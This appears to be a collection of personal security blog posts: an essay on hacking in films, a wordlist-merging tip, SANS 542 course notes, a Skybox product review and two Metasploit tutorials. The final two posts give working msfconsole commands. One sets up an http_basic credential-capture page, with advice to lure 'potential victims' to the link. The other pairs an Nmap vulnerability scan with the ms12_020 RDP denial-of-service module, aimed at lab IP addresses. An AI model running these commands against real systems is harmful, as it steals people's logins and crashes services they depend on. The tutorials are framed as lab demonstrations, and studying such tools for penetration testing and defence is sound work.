When it comes to Security - Nothing is Impossible

In 1995, the movie ‘Hackers’ premiered, and the feedback was unanimous: “Exaggerated! How on earth was that even possible?!”

Almost ten years on, and these ‘exaggerated’ ideas have become a reality. The film features a virus called ‘Da Vinci’ — a remote-controlled virus set to sink a fleet of oil tankers from afar. Exaggerated, right? Well, at this year’s Hack in the Box security conference, we learnt that the possibility of a virus hijacking an airline was not that far off.



An earlier film, ‘War Games’, sees Matthew Broderick playing a small-time hacker whose initial objective was simply to play games, but ends up hacking into the US Government’s mainframe. When challenged by his peers about the complexity of a system he has gained access to, he replies, “Hey, I don’t think any system is totally secure.”

This quote from a 1983 movie is still worryingly relevant in today’s society. Millions are spent on devising complex and diverse security architectures, but with every security advance, there are more determined and more specialised hackers attempting to break into the systems.

In today’s society, it takes a lot more than computer competence to become a hacker. Kevin Mitnick, one of the world’s best-known hackers and, at one time, America’s most wanted computer criminal, used simple social skills to overcome and bypass some of the most highly-secured facilities. Mitnick helped coin the term ‘social engineering’; using deception and emotional manipulation to gain access to otherwise impenetrable systems. As Bruce Schneier once said, “Amateurs hack systems. Professionals hack people.”

Electronic communications via email, chat applications, SMS, phone calls, or VoIP can all be broken down into zeros and ones. These days, communication means data, and data can mean information, which then leads to value. Controlling information means controlling the situation. Between 2007 and 2008, Chinese hackers were able to hack and control two US satellites for a total of 11 minutes, intercepting information transmitted between the satellite and NASA. Whoever gained access to the data chose not to do anything with it, but it became a landmark in highlighting issues of cyber security.

The new generation of hackers no longer just hack to disrupt services and infrastructure. They hack to take control of information and data. In the modern age of technology, the value of your data inside your flash drive could be one of the most valuable things in your arsenal.

The things that we have now, the systems we are using, the mobile phones we carry are the result of hacks that were done during the computer revolution back in the 70s. The technologies that you and I have at hand are partially the result of those people who broke the law to modify, create and innovate.

The gift of hindsight has allowed us to see the technological pathways that computer hacking has forged. Where once, hacking possibilities were at the hands of film directors and novelists, they now lie in the hands of anyone with imagination.

As industry leaders in communication, it is our job to have an awareness of the potential risks and pitfalls that hacking can create. By keeping an open mind to hackers and technological creativity, we can ensure that we are able to defend and foresee any threat in the digital world. As Einstein once said, “Imagination is sometimes better than knowledge.”


This article was also posted at http://tinyurl.com/m38xj2e

Compiling Word Lists in Linux

In this post, i will share with you how to compile all the text documents into one huge big list.

Say you have downloaded many txt files from the internet/torrent. And you have something like this >

Before we perform the compilation, make sure you place all the text files into a single directory and remove the empty folders.

Once done, copy the folder (which contained all the txt files) to a Linux.

Apply the following commands:

1) #cd /root/Desktop/Wordlist          --------> Cd into your folder that contains the text files
2) #cat *.* > /root/Desktop/Wordlist/Biglist.txt   -------> This will compile all the txt files into one huge list
3)#cat Biglist.txt | sort | uniq > Biglist2.txt      ----------> This will sort it and remove duplicates

SANS 542 - Web Application Penetration Testing: Day 1

SANS 542.1

The Attacker's View of the Web

Location: Bangkok's Crowne Plaza Hotel

Topics covered during Day 1:

>Setting up Samurai WTF

> Web Site Server Architecture

>Understanding HTTP protocol

>Pentesting Types and Methods

>Components of Web App pentest

>Reports of findings

>Attack Methodology

>Types of Flaws

>Javascript

While many of the day 1 lesson covered i already have the knowledge, there were also many that i learnt such as analyzing HTTP using Wireshark and Paros Proxy. Also i learnt how to decrypt HTTPS communication using Wireshark. Basic Javascript attacks such as XSS were introduced and will be covered more in the other days and im so looking forward for that! The trainer was from Belgium and he had a great command of the English language that could easily understood. Can't wait for day 2.

Skybox - How Skybox (Risk Control) can be used in a Pentest Engagement

So i went for a 3 day Skybox training to learn the fundamental uses of the product and i kinda liked it and although Skybox is meant to be used as an 'in house' product, it can be used for pentesting engagement.

Basically there are Five components in Skybox:
1) Firewall Assurance
     - http://www.skyboxsecurity.com/products/firewall-assurance
2) Network Assurance
     -http://www.skyboxsecurity.com/products/network-assurance
3) Risk Control
     -http://www.skyboxsecurity.com/products/risk-control
4) Threat Manager
     -http://www.skyboxsecurity.com/products/threat-manager
5) Change Manager
     -http://www.skyboxsecurity.com/products/changemanager

In this article, i will focus on the Risk Control component and how it can be used for a penetration testing scope. I will be using a Demo Model used during my training to illustrate to you the cool stuffs of Risk Control.

Note: The demo model was provided to me during the training. As it was a brief introduction of Skybox, there were no time to have a practical lessons on how to create a model and input information such as the vulnerabilities, hosts, etc from scratch and map it out into an architecture.

Once i loaded the model, the first thing i see is the list of vulnerabilities in the whole organization's network.

Finding Information

One of the features that i liked was the finding the information i want for example, if i want to find how many Critical vulnerabilities are there:

If i want to find a list of hosts with the name "app_0_db"

By default it wont show the Vulnerabilities tab, therefore we need to customize the window to view it.

Vulnerabilities Analysis

To view the information of the vulnerability, the General tab provides lots of information about it

It also shows the CVSS score of the vulnerability

Creating an Attacker

Let's create an virtual hacker/attacker from the Internet. This hacker will then be used to simulate the attacks later.

After creating the virtual attacker, we analyze the exposure of what are the possible targets of the attacker.

Simulating the Attack

Now that we have analyzed the exposure, its time to explore the attack.

After analyzing, we will see the kind of targets and the description of the attack as well as the Risk level.

To view a simulated attack, choose on a Target and click 'Attack Explorer'

From the above simulated attack, we can see how the attack was done, the vulnerabilities used, the steps of the attack, the ports used and the hosts that was attacked.

How can this integrate to a Penetration Testing Engagement

The Risk Control component of Skybox can be used to illustrate attacks and simulate hacking situations based on Live environment or What If scenarios without using the actual production environment itself. With this, it will be easier for pentesters to then perform a POC of the attack to confirm the possibility of the penetration. This would be useful for client organizations who wants to have an engagement but are very very afraid that such engagement could lead to a DOS or service failures.

The Disadvantage

1) While finding information and simulating attacks are fun and cool, one needs to do ALOT of work to get the initial config files, scanned hosts files, modelling it in Skybox and organizing it to output into something like this:

Only personnel who have extensive experience on designing the layout would be an advantage of using the Skybox.

2) While this component is very good and useful, the down side to it is that how many of the clients would actually provide all the switches, IPS/IDS and firewalls configurations to another Penetration Testing company? As Skybox is only useful to perform a proper security/network architecture analysis when fed with all the necessary config files. Without them, we cant make full use of Skybox capabilities....

METASPLOIT - Stealing Credentials (The Lazy Way)

Just when you think its all harmless and innocent.....

In this example, we are going to show how easy it is to steal credentials through deception. Fire up our metasploit,

#msfconsole

#msf > use auxiliary/server/capture/http_basic

#msf auxiliary(http_basic) > set URIPATH ClickMe

#msf auxiliary(http_basic) > exploit

A link will be generated and in this case its http://192.168.71.169:80/ClickMe. For quick kills, you need to find a way to provide this link to potential victims.

Once the victim receives the link and enters it in the URL;

A username and password is asked. Typically, unknown victims will input their domain credentials. For this example, i used the username= 'windowsusername' and the password='domainpassword'.

When the victim clicks Log In, the credentials are being sent to the attacker!

*Test was done with Mcafee AV status updated and Windows Firewall On. :)

NMAP & Metasploit - Scan and Exploit in 10mins

READY, SCAN, ATTACK!!!

First, we will find a target and ensure the host is up. We will do this by using Nmap:
#nmap -sn 192.168.71.156

Once we know the host is up and running, we will use Nmap to find any critical vulnerabilities. We invoke the command

#nmap --script vuln 192.168.71.156 --reason

With this command, Nmap will execute the NSE script called Vuln and scan the host for vulnerabilities. Once the scan completed, we can see the result and show the available vulnerability of the host. The result even provide us with the link to know more information of the vulnerability.

Now lets exploit that vulnerability! So first we need to locate whether the exploit is in the metasploit database. On your terminal, run

#locate ms12_020

The output shows that the exploit is available in metasploit.

Alternatively, you can also search the exploit in the MSFconsole itself by firing up #msfconsole and then run

#search ms12_020

Now that we know the exploit is available, we will now execute it.

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.71.156

msf  auxiliary(ms12_020_maxchannelids) > set RPORT 3389

msf  auxiliary(ms12_020_maxchannelids) > run

Once executed, the server will crash!!! Note that this is a Layer 7 DOS attack!